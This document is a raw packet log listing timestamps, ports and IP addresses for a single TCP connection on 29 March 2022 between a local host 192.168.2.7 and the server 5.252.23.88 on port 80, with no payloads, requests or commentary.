Mar 29, 2022 06:51:53.493911028 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.493969917 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494010925 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494014978 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494029999 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494076014 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494115114 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494117022 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494121075 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494152069 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494189978 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494195938 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494223118 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494263887 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494296074 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494299889 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494301081 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494339943 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494380951 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494388103 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494391918 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494421005 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494460106 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494462013 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494465113 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494499922 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494537115 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494539976 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494544983 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494575024 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494612932 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494616985 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494621992 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494651079 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494690895 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494698048 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494702101 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494746923 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494750023 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494807959 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494812965 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494869947 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494873047 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494930029 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.494956970 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.494990110 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.495013952 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.495047092 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.495052099 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.495105028 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.495152950 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.495157957 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.495161057 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.495212078 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.495253086 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.495258093 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.495260000 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.495419979 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.581135988 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.581197023 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.079188108 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.108997107 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.109025955 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.109054089 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.109078884 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.109105110 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.109128952 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.109154940 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.109169006 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.109180927 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.109204054 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.109205961 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.109213114 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.109230042 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.109262943 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.109299898 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.139039993 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139075041 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139094114 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139111996 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139130116 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139146090 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139149904 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.139163017 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139180899 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139189005 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.139197111 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139199018 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.139214993 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139226913 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.139233112 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139251947 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139269114 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139280081 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.139286041 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139300108 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.139302015 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139309883 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.139319897 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139337063 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139353991 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139368057 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.139370918 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139389038 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.139468908 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.139492035 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.139496088 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.169554949 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169596910 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169619083 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169640064 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169662952 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169683933 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169683933 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.169707060 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169729948 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169743061 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.169753075 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169775009 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169791937 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.169796944 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.169806004 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169825077 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.169828892 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169850111 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169872999 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169879913 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.169897079 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169902086 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.169918060 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.169956923 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170022011 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170085907 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170130014 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170154095 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170156956 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170186996 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170192957 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170212030 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170214891 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170238018 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170259953 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170264006 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170279026 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170289040 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170325041 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170341969 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170356989 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170365095 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170375109 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170394897 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170396090 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170417070 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170438051 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170439959 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170459032 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170459032 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170479059 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170489073 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170500040 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170504093 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170521975 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170545101 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170545101 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170548916 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170557976 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170567036 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170583963 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170588017 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170604944 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170609951 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170630932 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.170634031 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170656919 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.170681000 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.199784994 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.199841022 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.199893951 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.199943066 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.199963093 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.199995041 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200000048 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.200040102 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200093985 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.200149059 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200197935 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200249910 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200258970 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.200304031 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200350046 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200360060 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.200402021 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200445890 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200455904 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.200495958 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200541973 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200552940 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.200594902 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200639963 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200649023 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.200689077 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200741053 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200756073 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.200799942 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.200799942 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200844049 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.200850010 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200896978 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.200896978 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200948954 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.200989962 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201003075 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.201035023 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.201040983 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201083899 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201085091 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.201137066 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201185942 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201189041 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.201236963 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201281071 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201297045 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.201319933 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201354980 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.201375008 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201383114 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.201421022 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201471090 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.201472044 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201514959 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201570034 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201570034 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.201611042 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201659918 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:55.201662064 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201700926 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:55.201752901 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.061841965 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.092242002 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.092294931 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.092339993 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.092390060 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.092441082 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.092443943 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.092477083 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.092503071 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.092513084 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.092545986 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.092566013 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.092597008 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.092597961 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.092654943 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.092700005 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.092711926 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.092746019 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.092746973 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.092793941 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.092845917 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.122796059 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.122848988 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.122881889 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.122905970 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.122906923 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.122967958 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123014927 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123022079 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.123065948 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123114109 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.123114109 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123162985 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123205900 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.123209000 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123260021 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123302937 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123303890 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.123353004 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123395920 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.123398066 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123449087 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123492002 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.123495102 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123543024 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123585939 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123640060 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123650074 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.123681068 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123682976 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.123732090 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123774052 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.123776913 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123828888 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123872995 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123872995 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.123922110 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.123965979 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.153704882 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.153752089 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.153776884 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.153798103 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.153845072 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.153858900 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.153898954 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.153903961 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.153904915 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.153923035 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.153950930 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.153955936 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.153979063 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154000998 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.154017925 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.154031038 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154055119 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154073954 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.154093027 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.154108047 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154130936 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154155016 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154203892 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.154210091 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.154232979 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154256105 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154274940 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154303074 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.154315948 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154328108 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.154354095 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154376984 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154405117 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.154426098 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.154432058 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154455900 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154479027 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154498100 CEST	49793	80	192.168.2.7	5.252.23.88
